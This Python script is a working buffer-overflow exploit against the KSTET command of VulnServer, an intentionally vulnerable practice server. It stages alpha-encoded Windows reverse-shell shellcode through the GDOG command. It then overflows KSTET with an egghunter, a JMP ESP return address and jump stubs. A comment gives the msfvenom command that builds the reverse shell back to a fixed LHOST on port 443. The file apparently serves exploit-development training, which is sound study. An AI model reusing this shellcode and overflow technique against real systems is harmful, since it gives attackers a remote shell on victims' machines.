#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/04/25 21:19:20 dhn Exp $

import socket
import argparse

class Exploit:
    def __init__(self, server, port, payload, shellcode):
        self._shellcode = shellcode
        self._payload = payload
        self._server = server
        self._port = port

    def __connect(self):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self._server, self._port))
        return s


    def run(self):
        try:
            s = self.__connect()
            print("[+] Sending payload...")
            s.send("GDOG " + self._shellcode + "\r\n")
            s.recv(1024)
            s.send("KSTET " + self._payload + "\r\n")
            s.close()
        except socket.error:
            print("[!] Socket error...")
            return 1

def main(args):
    # msfvenom -p windows/shell_reverse_tcp LHOST=10.168.142.129 LPORT=443 \
    #        -f py -e x86/alpha_mixed -b '\x00' EXITFUNC=thread BufferRegister=EDI
    shellcode = ( "T00WT00W" +
        "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
        "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
        "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
        "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
        "\x6b\x4c\x7a\x48\x4d\x52\x47\x70\x63\x30\x67\x70\x35"
        "\x30\x4e\x69\x6a\x45\x30\x31\x79\x50\x53\x54\x6e\x6b"
        "\x62\x70\x50\x30\x6e\x6b\x53\x62\x76\x6c\x6e\x6b\x76"
        "\x32\x55\x44\x4e\x6b\x61\x62\x46\x48\x76\x6f\x6c\x77"
        "\x53\x7a\x66\x46\x76\x51\x4b\x4f\x6e\x4c\x37\x4c\x35"
        "\x31\x31\x6c\x44\x42\x34\x6c\x51\x30\x69\x51\x58\x4f"
        "\x74\x4d\x57\x71\x49\x57\x48\x62\x59\x62\x61\x42\x76"
        "\x37\x6c\x4b\x76\x32\x54\x50\x6c\x4b\x42\x6a\x77\x4c"
        "\x4e\x6b\x72\x6c\x34\x51\x62\x58\x58\x63\x47\x38\x47"
        "\x71\x7a\x71\x70\x51\x4e\x6b\x43\x69\x35\x70\x46\x61"
        "\x48\x53\x4c\x4b\x71\x59\x64\x58\x6b\x53\x36\x5a\x47"
        "\x39\x4e\x6b\x65\x64\x4c\x4b\x76\x61\x6e\x36\x30\x31"
        "\x59\x6f\x6c\x6c\x49\x51\x4a\x6f\x66\x6d\x73\x31\x38"
        "\x47\x64\x78\x6b\x50\x71\x65\x38\x76\x74\x43\x61\x6d"
        "\x49\x68\x77\x4b\x61\x6d\x34\x64\x44\x35\x6a\x44\x70"
        "\x58\x6c\x4b\x51\x48\x46\x44\x55\x51\x5a\x73\x73\x56"
        "\x4e\x6b\x54\x4c\x32\x6b\x6c\x4b\x32\x78\x75\x4c\x53"
        "\x31\x6a\x73\x6c\x4b\x37\x74\x6e\x6b\x46\x61\x38\x50"
        "\x4d\x59\x43\x74\x64\x64\x61\x34\x71\x4b\x33\x6b\x33"
        "\x51\x33\x69\x30\x5a\x43\x61\x49\x6f\x69\x70\x31\x4f"
        "\x73\x6f\x50\x5a\x6c\x4b\x47\x62\x68\x6b\x6e\x6d\x63"
        "\x6d\x50\x68\x47\x43\x65\x62\x73\x30\x53\x30\x45\x38"
        "\x53\x47\x61\x63\x36\x52\x51\x4f\x51\x44\x70\x68\x72"
        "\x6c\x54\x37\x57\x56\x75\x57\x79\x6f\x49\x45\x6f\x48"
        "\x4c\x50\x66\x61\x57\x70\x37\x70\x66\x49\x4f\x34\x46"
        "\x34\x46\x30\x52\x48\x37\x59\x4d\x50\x52\x4b\x45\x50"
        "\x69\x6f\x5a\x75\x76\x30\x70\x50\x52\x70\x66\x30\x67"
        "\x30\x70\x50\x71\x50\x46\x30\x31\x78\x4a\x4a\x66\x6f"
        "\x39\x4f\x79\x70\x4b\x4f\x78\x55\x4c\x57\x32\x4a\x76"
        "\x65\x53\x58\x37\x7a\x4e\x48\x6c\x4e\x6e\x61\x33\x58"
        "\x77\x72\x35\x50\x35\x51\x4d\x6b\x4d\x59\x68\x66\x71"
        "\x7a\x32\x30\x53\x66\x73\x67\x45\x38\x4f\x69\x4e\x45"
        "\x72\x54\x55\x31\x6b\x4f\x4e\x35\x4e\x65\x79\x50\x34"
        "\x34\x66\x6c\x69\x6f\x72\x6e\x73\x38\x54\x35\x78\x6c"
        "\x43\x58\x5a\x50\x4f\x45\x6f\x52\x76\x36\x4b\x4f\x6b"
        "\x65\x45\x38\x50\x63\x42\x4d\x61\x74\x57\x70\x4f\x79"
        "\x68\x63\x61\x47\x51\x47\x62\x77\x46\x51\x38\x76\x52"
        "\x4a\x37\x62\x32\x79\x36\x36\x38\x62\x49\x6d\x62\x46"
        "\x7a\x67\x31\x54\x76\x44\x67\x4c\x57\x71\x65\x51\x4c"
        "\x4d\x32\x64\x37\x54\x52\x30\x6b\x76\x65\x50\x42\x64"
        "\x43\x64\x72\x70\x36\x36\x53\x66\x63\x66\x42\x66\x33"
        "\x66\x62\x6e\x43\x66\x61\x46\x46\x33\x56\x36\x70\x68"
        "\x62\x59\x78\x4c\x45\x6f\x6d\x56\x79\x6f\x58\x55\x4b"
        "\x39\x49\x70\x30\x4e\x56\x36\x71\x56\x59\x6f\x36\x50"
        "\x45\x38\x45\x58\x6c\x47\x35\x4d\x33\x50\x79\x6f\x48"
        "\x55\x4d\x6b\x6b\x50\x55\x4d\x45\x7a\x57\x7a\x73\x58"
        "\x4e\x46\x6a\x35\x6d\x6d\x6d\x4d\x49\x6f\x68\x55\x77"
        "\x4c\x54\x46\x61\x6c\x75\x5a\x6f\x70\x59\x6b\x4b\x50"
        "\x30\x75\x35\x55\x6f\x4b\x37\x37\x64\x53\x51\x62\x70"
        "\x6f\x42\x4a\x53\x30\x71\x43\x4b\x4f\x48\x55\x41\x41"
    )

    # stage 1: add 0x06 bytes to eax and jmp to it
    # ADD EAX, 0x06 ; 83 c0 06
    # JMP EAX       ; ff e0
    add_eax = "\x90\x83\xc0\x06"
    jmp_eax = "\xff\xe0\x90\x90"
    jmp_esp = "\xbb\x11\x50\x62" # in essfunc.dll

    # stage 2: 32 byte egghunter -> W00TW00T
    egghunter = (
        "\x66\x81\xca\xff\x0f\x42\x52\x6a"
        "\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
        "\xef\xb8\x54\x30\x30\x57\x8b\xfa"
        "\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
    )

    # payload: 92 bytes
    payload = "\x90" * 8
    payload += egghunter + "\xcc" * (70 - 8 - len(egghunter))
    payload += jmp_esp
    payload +="\x90" * 10
    payload += add_eax + jmp_eax

    # fire and forget!
    exploit = Exploit(args.host, int(args.port), payload, shellcode)
    print("[+] VulnServer KSTET exploit by dhn")
    print("[+] Exploiting %s:%s" % (args.host, args.port))
    if exploit.run():
        print("[!] Fail")
    else:
        print("[+] Done")



if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('--host', required=True)
    parser.add_argument('--port', required=True)
    args = parser.parse_args()

    main(args)
